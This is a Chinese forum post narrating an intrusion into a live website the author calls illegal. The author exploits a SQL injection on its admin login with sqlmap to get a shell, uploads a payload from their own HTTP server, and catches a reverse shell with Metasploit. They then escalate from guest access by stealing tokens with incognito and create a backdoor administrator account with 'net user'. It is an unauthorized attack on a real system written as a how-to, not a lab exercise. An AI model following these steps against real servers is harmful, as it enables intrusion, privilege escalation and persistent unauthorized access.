电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2574 人浏览分享

非法网站从sqlmap到msf提权远程连接成功

[复制链接]
2574 0
本帖最后由 zhaorong 于 2020-10-20 16:22 编辑

一 前言

恐龙跑路.gif
这段时间一直在捣鼓sql注入和msf联合getshell,拿到网站服务器。
1.1收集信息
因为主要想练习sql注入,所以信息收集做的比较简单:
通过sqlmap获取shell权限利用msf获取反弹shell并getshell成功
通过fofa找到相关cms

5ee641dbd798db49073bd0e81f10cd4d_19856.jpg

发现后台登录页面有post sql注入
1.2利用sqlmap一把梭并获取os-shell

530508344a134d81574d1d6392178f73_89923.png

二.利用python搭建一个简单的http服务器
python -m SimpleHTTPServer

d3aa4c5832bcf7711efde23194ddabb3_23312.png

1.1在这里要给他的服务器写入一个目录
md C:\test
1.用自己的服务器上文件上传到被攻击服务器上

2a51ec497128bdd47d31035551333a83_80378.jpg
99.jpg
98.jpg

三 然后我们在msf上操作1.1 :输入 use exploit/mulit/hander1.2 : 输入 set lhost 接收反
弹shell的ip1.2 :输入 run 一把嗦

97.jpg
96.jpg

四.成功进入该服务器
这时发现我们只有gust权限 难受
五.开启艰难的提权之路1.1利用方法内核提权窃取管理tokens 提权
弟弟目前只知道着两种

3523fb9d46b69fbf698c7cdd0b869cae616aea94.png

本文只利用tokens 提权方式 有机会写一篇 内核提权的文章
使用use incognito来加载会话令牌模块
然后list_tokens -u来列出会话令牌

66.png

—————————————————————————————————
——————————————————————————————————
提权成功
六.创建用户
命令:net user 用户名 密码 /add

62.jpg


思索许久……发现忘了把自己加入管理员用户组了 !!!!!


61.png

32.jpg

搞定

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.